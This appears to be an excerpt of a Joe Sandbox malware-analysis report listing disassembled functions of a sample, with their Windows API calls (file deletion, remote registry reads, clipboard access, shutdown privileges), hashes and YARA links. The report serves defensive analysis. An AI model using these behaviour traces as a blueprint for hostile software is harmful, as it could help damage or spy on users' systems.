                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59619035204302AFD304FF60D885FAAB7A4AF85718F14456DF486876E2DB31D946CB62
                                                                                                                                                                                                                                                                                                    Function 00A873D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00A87403
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A87457
                                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A87493
                                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A874BA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A874F7
                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A87524
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b730a3c8a46531b7fa14a141d76082468af4d662d39b32592adf2365622e87e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 58e29e86251bf6c768df01bb42e61369e6914e953112ed2bd2ed9cb91a7a687f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b730a3c8a46531b7fa14a141d76082468af4d662d39b32592adf2365622e87e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADD16072508344AFC314EB64C985EAFB7ECAF88704F44092DF595D7292EB74DA88C762
                                                                                                                                                                                                                                                                                                    Function 00A8A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00A8A0A8
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00A8A0E6
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00A8A100
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00A8A118
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A8A123
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00A8A13F
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A8A18F
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00AD7B94), ref: 00A8A1AD
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8A1B7
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A8A1C4
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A8A1D4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: e9a0100f318a5a8bb874e1e61595e951c18d91c7bc4e0dcd92536355345e7b05
                                                                                                                                                                                                                                                                                                    • Instruction ID: a19f409a4c92103ee787cac3d15358b04a0fd859b7cb242d6a3319e14c67ca41
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9a0100f318a5a8bb874e1e61595e951c18d91c7bc4e0dcd92536355345e7b05
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB31D03260020A6BEB10EBB4DC4DADE77ACAF15320F000652E856E21D0EB70DE85CB21
                                                                                                                                                                                                                                                                                                    Function 00A84763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A84785
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A847B2
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A847E2
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A84803
                                                                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00A84813
                                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A8489A
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A848A5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A848B0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                    • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6cccdede40b07ea2e99fb352f4fab4d592020b9b5b106ac995fc37018b5b4e65
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5cb3876ac24a0e0caf4a27691af2537897c123118b89d20116b441257246e5a9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cccdede40b07ea2e99fb352f4fab4d592020b9b5b106ac995fc37018b5b4e65
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E431AF7190024AABDB21EBA0DC49FEB37BDEF8A744F1041B6F549D60A0EB709645CB64
                                                                                                                                                                                                                                                                                                    Function 00A8A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00A8A203
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00A8A25E
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A8A269
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00A8A285
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00A8A2D5
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00AD7B94), ref: 00A8A2F3
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8A2FD
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A8A30A
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A8A31A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A7E3B4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: 204cae938b7af2734cec5e34cd1deff93af940efbe5ded50f4a0d0099b3030e9
                                                                                                                                                                                                                                                                                                    • Instruction ID: a43b2c09feb872aedaadbd2d47c2daeab151ad48e1e287bd4d5dc856f7759af5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 204cae938b7af2734cec5e34cd1deff93af940efbe5ded50f4a0d0099b3030e9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2931D23150061A7AEB20FFB4DC09ADE77ACAF55324F104192F852A71E0EB71DE85CB61
                                                                                                                                                                                                                                                                                                    Function 00A9C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A9C10E,?,?), ref: 00A9D415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A9D3F8: _wcslen.LIBCMT ref: 00A9D4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A9C99E
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00A9CA09
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9CA2D
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A9CA8C
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A9CB47
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A9CBB4
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A9CC49
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00A9CC9A
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A9CD43
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A9CDE2
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00A9CDEF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 329f332aebfb9132b80af77c88dd6d9775d92d3ac3a31edaabc97f5c42631de9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 960c3f71d545ac4c2692ed0f5567d4ce5257774319bf09fea5c1edb2d0f8905c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 329f332aebfb9132b80af77c88dd6d9775d92d3ac3a31edaabc97f5c42631de9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78022071604600AFDB14DF28C995E2ABBF5EF49314F18849DF84ACB2A2DB31ED46CB51
                                                                                                                                                                                                                                                                                                    Function 00A7D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A155D1,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A15871
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7EAB0: GetFileAttributesW.KERNEL32(?,00A7D840), ref: 00A7EAB1
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00A7D9CD
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A7DA88
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00A7DA9B
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A7DAB8
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A7DAE2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00A7DAC7,?,?), ref: 00A7DB5D
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00A7DAFE
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00A7DB0F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3d234e7a62f7ada7aca647499de303cb5f92ff4eb4540e8f07af6064aee05b86
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e2eb8f66c40448193c15b22bccb62831cf965f499372281ca6412787b1db114
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d234e7a62f7ada7aca647499de303cb5f92ff4eb4540e8f07af6064aee05b86
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6614D3180510DEECF05EBE0DE929EDB7B5AF55340F6480A9E44AB7191EB319F4ACB60
                                                                                                                                                                                                                                                                                                    Function 00A8F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b49ac1368e44259364389c4feb4a56b4d1cd955b16fc703ddb001025b9294747
                                                                                                                                                                                                                                                                                                    • Instruction ID: b7311a455407444c824de7e320a3af0551bc63cc048dbba5f108f1c48caf275b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b49ac1368e44259364389c4feb4a56b4d1cd955b16fc703ddb001025b9294747
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6741AF35A04612AFD310DF55D888F55BBE4FF45318F14C4A9E86A8FAA2CB35ED42CB90
                                                                                                                                                                                                                                                                                                    Function 00A7F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A7205A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A72087
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72010: GetLastError.KERNEL32 ref: 00A72097
                                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00A7F249
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                    • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                    • Opcode ID: ee46b0519b124fdd5917f4d5287f71b72f4a30ce0de5c9f93e19bdb73217a972
                                                                                                                                                                                                                                                                                                    • Instruction ID: 14c147800e7d1e5bb1cdd95f88a3c534bb26dc5a2acd696785e2dd599b9cc743
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee46b0519b124fdd5917f4d5287f71b72f4a30ce0de5c9f93e19bdb73217a972
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7701A27A7102116FEB1863A89D8ABFE726CAB09354F15C531FD07E21D2E6604E0192E0
                                                                                                                                                                                                                                                                                                    Function 00A4BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4BD54
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4BD78
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4BEFF
                                                                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00AB46D0), ref: 00A4BF11
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00AE221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A4BF89
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00AE2270,000000FF,?,0000003F,00000000,?), ref: 00A4BFB6
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4C0CB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e7bbe59c434255034e8a61661cdbde8d4953445687aa5606c51cefdc48fda337
                                                                                                                                                                                                                                                                                                    • Instruction ID: 02bd3e7a757a75c35790dcd38202610bd15ff960e657afeee858caf95ae19a7d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7bbe59c434255034e8a61661cdbde8d4953445687aa5606c51cefdc48fda337
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72C12879910245AFDB24DF78CD41BEABBB9EFC1310F1445AAE5859B291E730CE42CB60
                                                                                                                                                                                                                                                                                                    Function 00A83A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A556C2,?,?,00000000,00000000), ref: 00A83A1E
                                                                                                                                                                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A556C2,?,?,00000000,00000000), ref: 00A83A35
                                                                                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00A556C2,?,?,00000000,00000000,?,?,?,?,?,?,00A166CE), ref: 00A83A45
